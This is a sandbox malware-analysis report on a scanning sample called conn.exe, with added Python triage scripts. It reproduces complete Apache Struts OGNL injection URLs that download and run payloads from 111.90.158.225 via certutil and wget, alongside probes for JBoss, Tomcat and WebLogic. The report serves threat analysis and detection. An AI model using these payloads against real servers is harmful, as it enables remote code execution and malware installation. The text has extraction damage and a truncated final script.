192.168.0.0:7001 - IP: 183.91.67.0:8040 (Indonesia) - IP: 183.91.67.0:9100 (Indonesia) - IP: 192.168.0.40:445 - IP: 183.91.67.0:5357 (Indonesia) - IP: 192.168.0.16:445 - IP: 192.168.0.3:445 - IP: 183.91.67.0:8883 (Indonesia) - IP: 192.168.0.0:2404 - IP: 192.168.0.0:49153 - IP: 183.91.67.0:8889 (Indonesia) - IP: 183.91.67.0:8888 (Indonesia) - IP: 183.91.67.0:1471 (Indonesia) - IP: 192.168.0.0:2376 - IP: 192.168.0.161:445 - IP: 183.91.67.0:4444 (Indonesia) - IP: 183.91.67.0:4443 (Indonesia) - IP: 192.168.0.0:49152
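
The 560 dead connections above are easier to read as a scan profile than as a list: one address per range (192.168.0.0 and 183.91.67.0) is tried on a long list of service ports, while port 445 is tried on host after host across 192.168.0.0/24. The Python script below is an added example, not part of the report or of the sample; it parses entries in the report's own `- IP: a.b.c.d:port (Country)` format and separates vertical sweeps (one target, many ports) from horizontal scans (one port, many hosts). SAMPLE is a constructed subset of the entries above, and the service names in KNOWN_PORTS are this example's own annotation, not something the report states.

```python
"""Build a scan profile from the report's 'Attempts to connect to a dead
IP:Port' list.

Added example for this report; it is not part of the report or of the sample.
It parses the report's own '- IP: a.b.c.d:port (Country)' entries and sorts
them into vertical sweeps (one target, many ports) and horizontal scans (one
port, many hosts). SAMPLE is a constructed subset of the entries above, and
the service names in KNOWN_PORTS are this example's annotation, not something
the report states.
"""
import re
from collections import defaultdict

SAMPLE = """\
- IP: 192.168.0.0:9943 - IP: 192.168.0.0:3689 - IP: 192.168.0.109:445 - IP: 192.168.0.0:4848 - IP: 183.91.67.0:2081 (Indonesia)
- IP: 183.91.67.0:2083 (Indonesia) - IP: 192.168.0.27:445 - IP: 183.91.67.0:445 (Indonesia) - IP: 192.168.0.0:8443 - IP: 192.168.0.113:445 - IP: 192.168.0.0:9200 - IP: 183.91.67.0:5900 (Indonesia)
- IP: 192.168.0.0:3389 - IP: 192.168.0.0:2375 - IP: 183.91.67.0:2376 (Indonesia) - IP: 192.168.0.0:1521 - IP: 192.168.0.0:11211 - IP: 192.168.0.0:50070 - IP: 192.168.0.0:445
"""

# One entry: "- IP: <ipv4>:<port>" with an optional "(Country)" tag, which the
# report prints only for non-private targets.
ENTRY_RE = re.compile(
    r"-\s*IP:\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})(?:\s*\(([^)]*)\))?")

KNOWN_PORTS = {
    445: "SMB", 3389: "RDP", 5900: "VNC", 1521: "Oracle TNS listener",
    2375: "Docker API (plain)", 2376: "Docker API (TLS)", 9200: "Elasticsearch",
    11211: "memcached", 50070: "Hadoop NameNode web UI", 8443: "HTTPS (alt)",
    4848: "GlassFish admin console", 3689: "DAAP",
}


def parse_entries(text):
    """Return (ip, port, country) tuples; country is None when absent."""
    return [(ip, int(port), country or None)
            for ip, port, country in ENTRY_RE.findall(text)]


def profile(entries, min_ports=10, min_hosts=3):
    """Group ports by target and targets by port, then flag the two scan
    shapes: a target hit on >= min_ports distinct ports (vertical sweep) and
    a port tried on >= min_hosts distinct targets (horizontal scan)."""
    ports_by_host = defaultdict(set)
    hosts_by_port = defaultdict(set)
    for ip, port, _country in entries:
        ports_by_host[ip].add(port)
        hosts_by_port[port].add(ip)
    vertical = {ip: sorted(ports) for ip, ports in ports_by_host.items()
                if len(ports) >= min_ports}
    horizontal = {port: sorted(hosts) for port, hosts in hosts_by_port.items()
                  if len(hosts) >= min_hosts}
    return {"ports_by_host": dict(ports_by_host),
            "hosts_by_port": dict(hosts_by_port),
            "vertical": vertical, "horizontal": horizontal}


def describe(port):
    """Label for a port, or 'unlabelled' when it is not in KNOWN_PORTS."""
    return KNOWN_PORTS.get(port, "unlabelled")


if __name__ == "__main__":
    prof = profile(parse_entries(SAMPLE))
    for ip, ports in prof["vertical"].items():
        labels = ", ".join(f"{p} ({describe(p)})" for p in ports)
        print(f"vertical sweep of {ip}: {len(ports)} ports: {labels}")
    for port, hosts in prof["horizontal"].items():
        print(f"horizontal scan on {port} ({describe(port)}): {len(hosts)} hosts")
```

Run against the full 560-entry list, the same two functions give the two facts a SOC needs from this section: the port list the sample sweeps on a single address (the service fingerprinting profile that feeds the HTTP probes later in the report) and the one port, 445, that it walks across the whole /24.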

Possible date expiration check, exits too soon after checking local time

- process: star.exe, PID 5560

Creates RWX memory

SetUnhandledExceptionFilter detected (possible anti-debug)

62 HTTP Request(s) detected

http://192.168.0.0/ (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/ (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/ (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/ (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/ (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/ws_utc/resources/setting/options/general (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/invoker/readonly (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/invoker/JMXInvokerServlet (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/jmx-console/HtmlAdaptor (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/orders.xhtml (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/users (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/dba_put.jsp/ (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/dba_put.jsp (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/manager/html (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0/wls-wsat/CoordinatorPortType (Hostname: 192.168.0.0, Port: 80, Count: 1)
http://192.168.0.0:113/ (Hostname: 192.168.0.0:113, Port: 113, Count: 1)
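
The twenty requests above are one pass of the scanner against a single target; the same sequence is replayed against 183.91.67.0 and 192.168.0.1 further down. Four of them carry Struts OGNL in the URL path (the `${...}/index.action` form used for S2-057, CVE-2018-11776), in two flavours: the older `#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS` bypass, and the newer one that clears `OgnlUtil`'s excluded package and class lists before calling `setMemberAccess`. Both then fetch the servlet response writer and print the output of `Runtime.exec(...)`, so the attacker reads command output in the HTTP response. The remaining requests are fingerprinting probes for JBoss (`/invoker/JMXInvokerServlet`, `/jmx-console/HtmlAdaptor`), Tomcat (`/manager/html`) and WebLogic (`/wls-wsat/CoordinatorPortType`, `/ws_utc/...`). The Python script below is an added example, not part of the report or of the sample; it URL-decodes each recorded URL, separates OGNL payloads from probes, and pulls out the `exec` command and the second-stage download URLs. SAMPLE_URLS is a constructed subset of the requests above; the product names in PROBE_PATHS are this example's annotation, not something the report states.

```python
"""Decode and classify the request URLs the sandbox recorded for conn.exe.

Added example for this report; it is not part of the report or of the sample.
It works on the URLs exactly as the report prints them (URL-encoded OGNL in the
path) and needs only the standard library. The product names in PROBE_PATHS
are this example's annotation of well-known paths, not something the report
states.
"""
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

PROBE_PATHS = {
    "/invoker/JMXInvokerServlet": "JBoss JMX invoker",
    "/invoker/readonly": "JBoss JMX invoker",
    "/jmx-console/HtmlAdaptor": "JBoss jmx-console",
    "/manager/html": "Tomcat Manager",
    "/wls-wsat/CoordinatorPortType": "WebLogic WS-AT endpoint",
    "/ws_utc/resources/setting/options/general": "WebLogic ws_utc test client",
}

# A Struts namespace-OGNL payload decodes to a path that starts with ${ and
# tampers with OGNL's member-access guard before calling Runtime.exec('...').
OGNL_MARKERS = ("@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS", "#_memberAccess",
                "setMemberAccess", "OgnlUtil")
EXEC_RE = re.compile(r"\.exec\('([^']*)'\)")
DOWNLOAD_RE = re.compile(r"https?://[^\s'\"&()|]+")

# Constructed subset of the requests listed above.
SAMPLE_URLS = [
    "http://192.168.0.0/",
    "http://192.168.0.0/ws_utc/resources/setting/options/general",
    "http://192.168.0.0/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action",
    "http://183.91.67.0/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action",
    "http://192.168.0.0/invoker/JMXInvokerServlet",
    "http://192.168.0.0/jmx-console/HtmlAdaptor",
    "http://192.168.0.0/dba_put.jsp/",
    "http://192.168.0.0/manager/html",
    "http://192.168.0.0/wls-wsat/CoordinatorPortType",
    "http://192.168.0.0:113/",
]


def decode_request(url):
    """Describe one recorded request: its kind, the decoded path and, for an
    OGNL payload, the shell command plus every URL that command fetches."""
    path = unquote(urlsplit(url).path)
    info = {"url": url, "path": path, "kind": "probe",
            "product": PROBE_PATHS.get(path.rstrip("/")),
            "command": None, "downloads": []}
    if path.startswith("/${") and any(m in path for m in OGNL_MARKERS):
        info["kind"] = "struts-ognl-rce"
        info["product"] = "Apache Struts 2 (OGNL in URL namespace)"
        m = EXEC_RE.search(path)
        if m:
            info["command"] = m.group(1)
            info["downloads"] = DOWNLOAD_RE.findall(m.group(1))
    return info


def summarize(urls):
    """Count request kinds and collect the distinct second-stage URLs."""
    decoded = [decode_request(u) for u in urls]
    kinds = Counter(d["kind"] for d in decoded)
    downloads = sorted({u for d in decoded for u in d["downloads"]})
    return {"kinds": dict(kinds), "downloads": downloads, "requests": decoded}


if __name__ == "__main__":
    report = summarize(SAMPLE_URLS)
    for r in report["requests"]:
        print(f"{r['kind']:16} {r['product'] or '-':40} {r['path'][:50]}")
        if r["command"]:
            print("    exec:", r["command"])
    print("second-stage downloads:", report["downloads"])
```

Decoded, the Windows payload runs `certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe` and then `cmd.exe /c c:\\fast.exe`; the Linux payload tests `uname --m` for x86_64, then fetches `ft32` or `ft64` into `.loop`, makes it mode 777 and runs it. Both stages are served by 111.90.158.225, the same host that served conn.exe itself (see the file-hosting URL at the top of the report), which makes that address the single most useful blocking indicator here. One shell detail worth knowing when reproducing the Linux branch: `A || B && C` groups as `(A || B) && C` in sh, so on a non-x86_64 host the ft64 branch still runs once the ft32 branch has succeeded.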

http://183.91.67.0/ (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/ (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/ (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/ (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/ (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/ws_utc/resources/setting/options/general (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/invoker/readonly (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/invoker/JMXInvokerServlet (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/jmx-console/HtmlAdaptor (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/orders.xhtml (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/users (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/dba_put.jsp/ (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/dba_put.jsp (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/manager/html (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0/wls-wsat/CoordinatorPortType (Hostname: 183.91.67.0, Port: 80, Count: 1)
http://183.91.67.0:113/ (Hostname: 183.91.67.0:113, Port: 113, Count: 1)

http://192.168.0.0:3389/ (Hostname: 192.168.0.0:3389, Port: 3389, Count: 1)
http://183.91.67.0:3389/ (Hostname: 183.91.67.0:3389, Port: 3389, Count: 1)

http://192.168.0.1/ (Hostname: 192.168.0.1, Port: 80, Count: 1)
http://192.168.0.1/ (Hostname: 192.168.0.1, Port: 80, Count: 1)
http://192.168.0.1/ (Hostname: 192.168.0.1, Port: 80, Count: 1)
http://192.168.0.1/ (Hostname: 192.168.0.1, Port: 80, Count: 1)
http://192.168.0.1/ (Hostname: 192.168.0.1, Port: 80, Count: 1)
http://192.168.0.1/ws_utc/resources/setting/options/general (Hostname: 192.168.0.1, Port: 80, Count: 1)
http://192.168.0.1/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 192.168.0.1, Port: 80, Count: 1)
http://192.168.0.1/%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27certutil.exe%20-urlcache%20-split%20-f%20http://111.90.158.225/d/fast.exe%20c:/fast.exe&cmd.exe%20/c%20c:%5C%5Cfast.exe%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 192.168.0.1, Port: 80, Count: 1)
http://192.168.0.1/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27uname%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/index.action (Hostname: 192.168.0.1, Port: 80, Count: 1)

http://192.168.0.1/%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEM

BER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatc

her.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]

mmons.io.IOUtils@toString%[email protected]@getRuntime%28%29.exec%28%27uname

%20--m%7Cgrep%20x86_64%20%3E%3E%20/dev/null%20%7C%7C%20(pkill%20loop%20&&%

20wget%20-O%20.loop%20http://111.90.158.225/d/ft32%20&&%20chmod%20777%20.loop%20

&&%20./.loop)&&(pkill%20loop%20&&%20wget%20-O%20.loop%20http://111.90.158.225/d/ft64

%20&&%20chmod%20777%20.loop%20&&%20./.loop)%27%29.getInputStream%28%29%29%2

9%29.%28%23w.close%28%29%29%7D/index.action

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/invoker/readonly

Hostname: 192.168.0.1

Page 41 Date: 2020-02-15 01:57:34

Page 42: Infosec Binary Analisys conn · Infosec Binary Analisys SHELL32.dll ole32.dll WS2_32.dll USER32.dll 13 Behaviors detected by system signatures Created network traffic indicative of

Infosec Binary Analisys

IP Address:

Port: 80

Count: 1

http://192.168.0.1/invoker/JMXInvokerServlet

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/jmx-console/HtmlAdaptor

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/orders.xhtml

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/users

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/dba_put.jsp/

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/dba_put.jsp

Hostname: 192.168.0.1

IP Address:

Page 42 Date: 2020-02-15 01:57:34

Page 43: Infosec Binary Analisys conn · Infosec Binary Analisys SHELL32.dll ole32.dll WS2_32.dll USER32.dll 13 Behaviors detected by system signatures Created network traffic indicative of

Infosec Binary Analisys

Port: 80

Count: 1

http://192.168.0.1/manager/html

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1/wls-wsat/CoordinatorPortType

Hostname: 192.168.0.1

IP Address:

Port: 80

Count: 1

http://192.168.0.1:113/

Hostname: 192.168.0.1:113

IP Address:

Port: 113

Count: 1

1 Host(s) detected

IP Address Hostname Reverse DNS

183.91.67.0

1 Countr(y|ies) detected

Hosts Country

1 Indonesia
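A triage routine for request lists like the one above, written for this page as an added example; it is not part of the sandbox report or of any tool named on it. It percent-decodes each request path until the decoding is stable, flags the OGNL sandbox-escape constructs the four injection requests use, recovers the command string handed to Runtime.exec together with the download URLs inside it, and labels the remaining paths that are known administrative endpoints. SAMPLE_REQUESTS are four of the page's own observed requests, line-joined; in the two injection URLs the class names that the extracted text shows as "[email protected]" are restored from the surrounding OGNL fragments, which is an inference. The endpoint labels in PROBE_PATHS are this example's attribution of the paths, not something the report states.

```python
"""Triage sandbox-recorded request URLs for Apache Struts OGNL injection.

Added example for this page, not code from the report. SAMPLE_REQUESTS are
four of the report's observed requests to 192.168.0.1, line-joined; in the two
injection URLs the class names that the extracted text shows as the token
'[email protected]' are restored from the surrounding OGNL (an inference).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import unquote, urlsplit

# OGNL fragments used to escape the Struts sandbox and reach Runtime; none
# of them belongs in a legitimate action name or parameter value.
OGNL_MARKERS = (
    "#_memberAccess",
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    ".setMemberAccess(",
    ".getExcludedPackageNames().clear()",
    ".getExcludedClasses().clear()",
    "@java.lang.Runtime@getRuntime()",
    "java.lang.ProcessBuilder",
)
# Admin / deserialization endpoints the same scan touched. The labels are this
# example's attribution of the paths; the report lists only the paths.
PROBE_PATHS = {
    "/invoker/readonly": "JBoss HTTP invoker",
    "/invoker/JMXInvokerServlet": "JBoss JMXInvokerServlet",
    "/jmx-console/HtmlAdaptor": "JBoss jmx-console",
    "/wls-wsat/CoordinatorPortType": "WebLogic WLS-WSAT",
    "/ws_utc/resources/setting/options/general": "WebLogic web service test client",
    "/manager/html": "Tomcat manager",
}
EXEC_RE = re.compile(r"\.exec\(\s*'((?:[^'\\]|\\.)*)'\s*\)")  # argument of exec('...')
URL_RE = re.compile(r"https?://[^\s'\"&|;()]+")              # download URLs inside it


@dataclass
class Finding:
    url: str
    verdict: str                          # "ognl-rce", "probe" or "clean"
    markers: List[str] = field(default_factory=list)
    command: Optional[str] = None         # OS command passed to Runtime.exec
    payload_urls: List[str] = field(default_factory=list)


def decode_path(url: str) -> str:
    """Percent-decode the path until stable, so double encoding cannot hide markers."""
    path = urlsplit(url).path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def triage(url: str) -> Finding:
    path = decode_path(url)
    markers = [m for m in OGNL_MARKERS if m in path]
    if markers:
        match = EXEC_RE.search(path)
        command = match.group(1) if match else None
        return Finding(url, "ognl-rce", markers, command, URL_RE.findall(command or ""))
    probe = PROBE_PATHS.get(path.rstrip("/"))
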